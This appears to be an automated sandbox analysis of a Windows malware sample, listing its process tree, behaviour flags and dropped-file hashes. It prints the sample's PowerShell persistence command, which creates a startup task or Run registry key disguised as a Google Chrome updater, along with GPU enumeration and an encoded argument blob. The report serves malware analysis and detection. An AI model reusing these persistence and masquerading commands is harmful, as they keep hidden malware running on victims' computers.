C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rosbrqmf#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe rkostbomswpysz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:768
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:4644
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:3720
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe lpvrtgaoraybnvjp 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeMR2zIsa2YhX3HvrJ76L3PYAw7qlLpJBbIeCTNKBaLPSykUvzekO7koObVh69XukHNmYf5W8bMDaMPHDBhALjxm6ziWFUO9JHrnjNDYz4TjXjDaYA24sYnWlUXH83ZDmapbvZr3aqfKfyG9nx4moeRNlWj2lCejFqkaCPIieIWBnpkI3QbS0BzxviXA/4GRSKOWNHKn1bm7X3fdig6VZbCjqyzHehh8LEsH5QnzNW7X1zr4wsp4wmti6JKB2Z96l0RN9iP9PutKKsk+KJv1YK7cQAIwLotcd2/KqbIHXAW6N6liCNwugSW24ESXQmTzPxdnoYjZr2hpHGhqvVe54HraR7se9rJ/j7PQ+9BChih6hZJgcUrwa1KkW1gkRPN5dNRlmr7HMPGYgY695nz/U05zjCKr1NrGSmx9TSWA5uF+g=2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4240
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3484
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53.0MB
MD557afcb97e60f92e2fe43d869d5a432d5
SHA1b29668c32b353efdcab5aa367f761e1f1682ea91
SHA2567c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
SHA51270e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
Filesize
53.0MB
MD557afcb97e60f92e2fe43d869d5a432d5
SHA1b29668c32b353efdcab5aa367f761e1f1682ea91
SHA2567c640fe9a4d562fbec6fd8b51daca0a133465845fc4a8de35e2f6af95a8e9611
SHA51270e444062d1bf30ea500e55353d790e7c0a9d0985b4e90f2f008881f44cd68a50e64b46280c38fae8c482fcf2c21d98c3595752bec6e0805032dab07e672407f
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
944B
MD559d97011e091004eaffb9816aa0b9abd
SHA11602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA25618f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6
-
Filesize
1KB
MD54915f53060b9d5363c2eb0ea838c2836
SHA1489ed44b5c85e7c8bc7a44b3bdce29986cead302
SHA2567828be27455ec80e2c1273a7243655455a62dfd66afee04e007bf26da428e0e7
SHA5124003143cb71f32b469b4e48370e45ad7b8dd3f49e9e7c41caf193464ab5fe3d31ae4ded09e58b122c42a5eda65e868bd6ca1be335aeadf2d2ac303cce043243c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5